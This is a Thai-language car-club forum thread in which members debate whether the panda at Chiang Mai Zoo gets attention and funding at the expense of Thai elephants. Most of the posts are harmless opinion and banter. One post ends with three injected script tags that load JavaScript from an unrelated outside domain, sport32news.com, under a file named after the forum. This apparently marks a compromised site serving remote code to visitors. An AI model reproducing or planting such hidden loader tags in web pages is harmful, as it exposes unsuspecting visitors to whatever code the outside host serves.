ตอบ
N_J Civic

เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 30 พฤษภาคม 2013 17:00 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
bandai_join พิมพ์ว่า:
ผมคนนึงล่ะไม่ไปดูแพนด้าที่เชียงใหม่  ค่าเข้าก็แพง ขับรถไป อยุธยา ไปดูช้างดีกว่า 55555เคยเอาสัปรสไปให้ช้างกินด้วย มันเก่งมาก 

ใจดีจัง
ก่อนหน้านี้ผมอยู่ยุดยา พาพ่อ-แม่-หลาน ไปดูช้างเอาอ้อยกล้วยป้อนมันน่ารักจริง ๆ ครับ แถมมันยังเต้นขอบคุณเราอีกนะ
อีกที่ก็ไปดูที่สวนสามพราน น่ารักพอ ๆ กัน
แต่แพนด้าที่เชียงใหม่ตั้งแต่นำเข้าตัวเล็กๆยันโต...ผมไม่เคย(คิด)ไปดูเลยครับ

Patchai

เข้าร่วม: 13 มกรา 2012
ตอบ: 405

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 300
ให้คำขอบคุณ: 826

ปี: 2004
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 30 พฤษภาคม 2013 18:19 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
.. ไม่รักช้างกันบ้างเลย
ได้รับคำขอบคุณจาก: N_J Civic 
ham_ter

ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
พฤหัส, 30 พฤษภาคม 2013 18:46 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
N_J Civic พิมพ์ว่า:

civic_ubon พิมพ์ว่า:
ดูข่าวเรื่องนี้ทีไรของขึ้นเลย เราคนไทยไม่เอาแพนด้าๆ

อย่างน้อยก็มีอีกหนึ่งเสียที่คิดเหมือนผม...ขอบคุณครับ

จะต้องมีประเด็นนี้ทุกที หลินปิง กับ ช้าง เกี่ยวไรกัน.. แล้วทำไมต้องเป็นงบของหลินปิง
ในเมื่อประเทศชาติมีงบประมาณมากมายที่ทำเรื่องไร้สาระ เช่น ความเจริญทางวัตถุต่างๆ
หรือ งบประมาณที่รัฐเอาไปผลาญเรื่องไร้สาระ ทำไมพวกคุณไม่ทวงมันมาช่วยช้าง
เมื่อก่อนตอนไม่มีหลินปิง ก็ไม่เห็นพวกคุณจะเรียกร้อง งบประมาณอะไรจากรัฐไปช่วยช้าง
พวกคุณอย่าทำตัวตามกันโดยไม่รู้เรื่องไรเลย ช้าง กับ หลินปิง มันคนละส่วนกัน...
เลิกสักทีให้คนอื่นจูงจมูกแบบนี้สักที....
จำไว้ก่อนมีหลิงปิง พวกคุณก็ไม่ได้รักช้างอะไรแบบนี้ ก็ไม่เห็นมีใครคนไหนมารณรงค์เรื่องช่วยช้าง .

เพราะมองมุมกลับ การมีแพนด้า ทำให้มีแม่เหล็กในการดึงดูด ให้คนไปเที่ยวสวนสัตว์ เชียงใหม่
ไปเที่ยว ไปพัก กลายเป็นแลนด์มาร์ค ส่งเสริมเศรษฐกิจ ซึ่งตีกลับมาเป็นเงิน มากกว่า 60 ล้านบาท 

ส่วนตัว เชื่อว่าคนไทยทุกคนรักช้างไทยและไม่อยากเห็นช้างไทยลำบากกว่าหมีแพนด้า
แต่....เชื่อเถอะหมีแพนด้ามันทำกำไรให้สวนสัตว์ได้เยอะกว่าช้างไทยเราเพราะอะไรหรอ
เพราะว่าคนไทยรักช้างไทยแต่ปากรักช้างแต่ในเฟสบุ้ค...ปาวๆกันแต่ในเวปบอร์ด
แต่พอมีโอกาสก็ยอมเสียเงินเข้าไปดูหมีแพนด้าอยู่ดี..
รักแบบนี้มันช่วยไรช้างไม่ได้หลอกเราต้องช่วยกันสนับสนุนเมืองไทยเรามีปางช้างหลายแห่งนะ...
แต่เชื่อมั้ยว่าถ้าฝรั่งมาถามคนไทยว่าจะไปเที่ยวปางช้างไปที่ไหนไปยังไง........
น้อยคนที่จะตอบได้เลยทันทีถ้าไม่ต้องรอหาข้อมูลในเน็ต.....
สิ่งที่จะช่วยให้ช้างเราอยู่ดีกินดีคือมาสนับสนุนให้คนไปเที่ยวชมปางช้างเหล่านั้นดีกว่า
ดีกว่าเสียเวลาแชร์ภาพช้างกับหมีแพนด้าอีก....
ช่วยกันโปรโมทให้นักท่องเที่ยวรู้ว่าปางช้างและช้างไทยมาแล้วสนุกและได้อะไรเยอะกว่าการไปดูหมีนั่งกินไผ่ไปวันๆ....
รักช้างไทยต้องไม่รักแต่ปากแล้วหมีแพนด้าก็จะแพ้ช้างไทยเราไปเองค่ะ...
สวัสดี.............

ได้รับคำขอบคุณจาก: Ton- 
malmsteen

ชื่อเล่น: เอ็ม

เข้าร่วม: 23 ตุลา 2009
ตอบ: 178

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 159
ให้คำขอบคุณ: 286

สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 30 พฤษภาคม 2013 19:57 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
คงเป็นเพราะช้างไทยยังมีอีกเยอะ คงต้องให้เหลือ 1-2 ตัว ถึงจะเห็นค่า
netgame02

ชื่อเล่น: ตอง

เข้าร่วม: 24 กรกฎา 2012
ตอบ: 1689

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 878
ให้คำขอบคุณ: 601

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 30 พฤษภาคม 2013 21:25 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
พุดอีก ก็ถูกอีก
N_J Civic

ครอบครัว ES
ครอบครัว ES

สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 30 พฤษภาคม 2013 23:10 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
ham_ter พิมพ์ว่า:

ดูข่าวเรื่องนี้ทีไรของขึ้นเลย เราคนไทยไม่เอาแพนด้าๆ

อย่างน้อยก็มีอีกหนึ่งเสียที่คิดเหมือนผม...ขอบคุณครับ

จะต้องมีประเด็นนี้ทุกที หลินปิง กับ ช้าง เกี่ยวไรกัน.. แล้วทำไมต้องเป็นงบของหลินปิง
ในเมื่อประเทศชาติมีงบประมาณมากมายที่ทำเรื่องไร้สาระ เช่น ความเจริญทางวัตถุต่างๆ
หรือ งบประมาณที่รัฐเอาไปผลาญเรื่องไร้สาระ ทำไมพวกคุณไม่ทวงมันมาช่วยช้าง
เมื่อก่อนตอนไม่มีหลินปิง ก็ไม่เห็นพวกคุณจะเรียกร้อง งบประมาณอะไรจากรัฐไปช่วยช้าง
พวกคุณอย่าทำตัวตามกันโดยไม่รู้เรื่องไรเลย ช้าง กับ หลินปิง มันคนละส่วนกัน...
เลิกสักทีให้คนอื่นจูงจมูกแบบนี้สักที....
จำไว้ก่อนมีหลิงปิง พวกคุณก็ไม่ได้รักช้างอะไรแบบนี้ ก็ไม่เห็นมีใครคนไหนมารณรงค์เรื่องช่วยช้าง .

เพราะมองมุมกลับ การมีแพนด้า ทำให้มีแม่เหล็กในการดึงดูด ให้คนไปเที่ยวสวนสัตว์ เชียงใหม่
ไปเที่ยว ไปพัก กลายเป็นแลนด์มาร์ค ส่งเสริมเศรษฐกิจ ซึ่งตีกลับมาเป็นเงิน มากกว่า 60 ล้านบาท 

ส่วนตัว เชื่อว่าคนไทยทุกคนรักช้างไทยและไม่อยากเห็นช้างไทยลำบากกว่าหมีแพนด้า
แต่....เชื่อเถอะหมีแพนด้ามันทำกำไรให้สวนสัตว์ได้เยอะกว่าช้างไทยเราเพราะอะไรหรอ
เพราะว่าคนไทยรักช้างไทยแต่ปากรักช้างแต่ในเฟสบุ้ค...ปาวๆกันแต่ในเวปบอร์ด
แต่พอมีโอกาสก็ยอมเสียเงินเข้าไปดูหมีแพนด้าอยู่ดี..
รักแบบนี้มันช่วยไรช้างไม่ได้หลอกเราต้องช่วยกันสนับสนุนเมืองไทยเรามีปางช้างหลายแห่งนะ...
แต่เชื่อมั้ยว่าถ้าฝรั่งมาถามคนไทยว่าจะไปเที่ยวปางช้างไปที่ไหนไปยังไง........
น้อยคนที่จะตอบได้เลยทันทีถ้าไม่ต้องรอหาข้อมูลในเน็ต.....
สิ่งที่จะช่วยให้ช้างเราอยู่ดีกินดีคือมาสนับสนุนให้คนไปเที่ยวชมปางช้างเหล่านั้นดีกว่า
ดีกว่าเสียเวลาแชร์ภาพช้างกับหมีแพนด้าอีก....
ช่วยกันโปรโมทให้นักท่องเที่ยวรู้ว่าปางช้างและช้างไทยมาแล้วสนุกและได้อะไรเยอะกว่าการไปดูหมีนั่งกินไผ่ไปวันๆ....
รักช้างไทยต้องไม่รักแต่ปากแล้วหมีแพนด้าก็จะแพ้ช้างไทยเราไปเองค่ะ...

ขอโทษครับ อุดมการณ์แบบนั้นผมไม่มี และข้อมูลเยอะเกินขี้เกียจอ่าน
nut_say

เข้าร่วม: 12 พฤษภาคม 2013
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 18
ให้คำขอบคุณ: 9
พฤหัส, 30 พฤษภาคม 2013 23:21 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย

ขอโทษครับ อุดมการณ์แบบนั้นผมไม่มี และข้อมูลเยอะเกินขี้เกียจอ่าน

Like อิอิ

ได้รับคำขอบคุณจาก: N_J Civic  DELL 
bbb@es

เข้าร่วม: 14 ธันวา 2008
ตอบ: 993

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1161
ให้คำขอบคุณ: 48

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 31 พฤษภาคม 2013 05:54 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
เอาตังสร้างห้องเยนมาซื้ออาหารหมากะซื้อภูเขาปลูกอ้อย-สัปปะรดให้ช้างป่ากะสัตว์ป่าที่ลงมาพืชไร่
ชาวบ้านแล้วโดนไล่ซะดีกว่า
ได้รับคำขอบคุณจาก: N_J Civic  DELL 
Pantamitr

ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ศุกร์, 31 พฤษภาคม 2013 07:36 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย

สุดท้าย เรื่องนี้มันก็พาไปเกี่ยวกับการเมือง
ผมไม่อยากให้ พวกเราชาวคลับไปยุ่งกับการเมืองเล้ย พับผ่า มันพาเสียบรรยากาศหมด
การเมืองมันควรจะเป็นความเห็นส่วนบุคคล อะไรที่โยงไปการเมืองได้ อย่าคุยดีกว่าครับ มันจะไม่จบ
เรื่องการเมือง เอ่ยถึงใครเข้าไป มีทั้งคนชอบ และไม่ชอบ ถ้าเอามาคุยกัน เดี๋ยวก็ได้ทะเลาะกัน

ด้วยความเคารพนะครับ
N_J Civic

ครอบครัว ES
ครอบครัว ES

ศุกร์, 31 พฤษภาคม 2013 09:30 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
Pantamitr พิมพ์ว่า:

สุดท้าย เรื่องนี้มันก็พาไปเกี่ยวกับการเมือง
ผมไม่อยากให้ พวกเราชาวคลับไปยุ่งกับการเมืองเล้ย พับผ่า มันพาเสียบรรยากาศหมด
การเมืองมันควรจะเป็นความเห็นส่วนบุคคล อะไรที่โยงไปการเมืองได้ อย่าคุยดีกว่าครับ มันจะไม่จบ
เรื่องการเมือง เอ่ยถึงใครเข้าไป มีทั้งคนชอบ และไม่ชอบ ถ้าเอามาคุยกัน เดี๋ยวก็ได้ทะเลาะกัน

ด้วยความเคารพนะครับ

อันที่จริง กระทู้ที่สร้างขึ้นก็แค่เพราะความไม่ชอบส่วนตัวผมเองครับ ส่วนคนที่เข้ามาแสดงความคิดเห็นก็แล้วแต่มุมมองครับ
แต่ถ้า Admin เห็นว่าไม่เหมาะก็ลบได้ครับผม

ได้รับคำขอบคุณจาก: Pantamitr 
yutthaphum

เข้าร่วม: 24 มกรา 2011
ตอบ: 835

Guru ES
Guru ES

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 590

สี: น้ำเงิน วิวิด (มุก) (B-502P)
เสาร์, 1 มิถุนา 2013 00:10 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
ผมรักช้างไทย มันน่ารักกว่าแพนดาซะอีก 

ช้างเป็นสัตย์คู่บ้านคู่เมือง

ไม่ใช่แพนดา 
nattaponCM

เข้าร่วม: 17 มีนา 2013
ตอบ: 489

ได้รับคำขอบคุณ: 300
ให้คำขอบคุณ: 141

สี: แดง แรลไล (R-513)
เสาร์, 1 มิถุนา 2013 00:22 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
เห็นด้วยอย่างยิ่งครับ สมัยก่อนพระนเรศวรหาได้ขี่แพนด้าไปรบไม่ กลับเป็นก้านกล้วย ที่เป็นสัตว์คู่บ้านคู่เมืองมาแต่กาลนาน

ปล.รูปที่2ที่มีสะพานยาวๆไม่ใช่แพนด้หรือว่าสโนว์โดมครับ แต่นั่นคือศูนย์แสดงพันธุ์สัตว์น้ำ เชียงใหม่ซูอควาเรี่ยมครับ
EsNon

เข้าร่วม: 19 พฤศจิกา 2008
ตอบ: 315

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 324
ให้คำขอบคุณ: 957

สี: เทา ซิกเนต (เมทัลลิก) (RP-31M)
เสาร์, 1 มิถุนา 2013 12:36 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
สงสารช้างไทย
DELL

ชื่อเล่น: หนุ่ม

เข้าร่วม: 12 ธันวา 2008
ตอบ: 2245

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1831
ให้คำขอบคุณ: 5795

สี: น้ำเงิน วิวิด (มุก) (B-502P)
เสาร์, 1 มิถุนา 2013 12:43 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
ผมเฉยๆๆ กับแพนด้านะ จะอะไรมากมายกับแพนด้า เหมือนที่เพื่อนๆๆๆว่า นั่งแดกไผ่อย่างเดียว ไม่ได้อะไรเลย

เมื่อ 2 ปีก่อนได้ไปดูแพนด้า ผมยืนดูไม่ถึง 5 นาที เดินออกมาพูดกับแฟน มันมีอะไรหรอ นั่งเฉยๆๆๆ เนี้ยนะ

ผมบอกเลยว่าจะไม่มาดูอีก

++++ แต่มุมมองกับช้างไทย น่าจะใส่ใจเค้าให้มากกว่านี้ เห็นข่าวช้างที่ไรอดสงสารไม่ได้ เดินตามท้องถนน แดดก็ร้อน

สงสารเค้า สอนก็ได้ แต่แพนด้า นั่งแดกแต่ไผ่ ไม่มีประโยชน์ส่งกลับเหอะ
ได้รับคำขอบคุณจาก: honeybeex7 
Ekk_bangyai

เข้าร่วม: 13 ธันวา 2012
ตอบ: 231

ได้รับคำขอบคุณ: 153
ให้คำขอบคุณ: 438

เสาร์, 1 มิถุนา 2013 12:46 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
เอามาทำไมเเพนด้า เอาเวลาไปดูเเลช้างไทยดีกว่า
Prince-Moshi

เข้าร่วม: 21 กรกฎา 2010
ตอบ: 16

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 29
ให้คำขอบคุณ: 0

สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 1 มิถุนา 2013 23:12 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
ปัญญาอ่อนครับ

แพนด้าคือารลงทุนครับ

ในเมื่อมันมีในไทยแค่ 2 ตัว เท่ากับว่าเป็นสัตว์ที่หาดูยาก

และเมื่อหาดูยาก คนย่อมไปดู นั้นคือ กระตุ้นการท่องเที่ยว แบะหารายได้เข้าสวนสัตว์

รายได้นั้น อาจนำไปสนับสนุนช้างก็เป็นได้

อย่าฟังความข้างเดียว อย่าดูแค่ภายนอกครับ มองลึกๆ
ฟ้าพลอย

เข้าร่วม: 04 พฤษภาคม 2013
ตอบ: 94

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 43
ให้คำขอบคุณ: 12
เสาร์, 1 มิถุนา 2013 23:33 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
ช้างบ้านเรามีค่านะครับ     ตรง  งา   แค่นั้น   กินก็ของถูก  อะไรก็ได้  ขอให้กินได้  แต่...... กินก็เรื่องมากๆ อากาศก็ต้องเย็น
ช้างบ้านเราอยู่ได้หมด ขอให้มีที่    ถ้าช้างไทยได้ งบ มาคงอยู่ได้สบาย   สงสารนะพ่อช้างเมืองไทย อยากให้แอร์ที่โดมมันเสีย ไฟมันตัด ไผ่มันเน่า ผัวมันเป็นหมัน  อิอิอิ  ที่พูดมาทั้งหมด  พูดเล่นนะ  มันเป็นไปตาม .......ชั้น ......หรือเท่ากับ.....ปลาใหญ่กินปลาเล็ก......ทำได้อย่างเดียว.....ทำใจนะพ่อช้าง
Cool_M

ชื่อเล่น: แม็ก

เข้าร่วม: 18 ธันวา 2012
ตอบ: 1928

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2509
ให้คำขอบคุณ: 2304

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 1 มิถุนา 2013 23:38 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย
น้องสาวอยากดูแพนด้า เปลี่ยนใจพาไปดูช้างดีก่า ช้างน้อยๆๆๆๆ<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
trucklinkin

ชื่อเล่น: โจ้

เข้าร่วม: 20 เมษา 2012
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 826
ให้คำขอบคุณ: 1196

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 8 มิถุนา 2013 10:03 - มันสมควรไหม...???-->อาจขัดใจใครบางคนที่ไม่เห็นด้วย

เยอะ ตลอด

ตอบ
หน้า 3 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.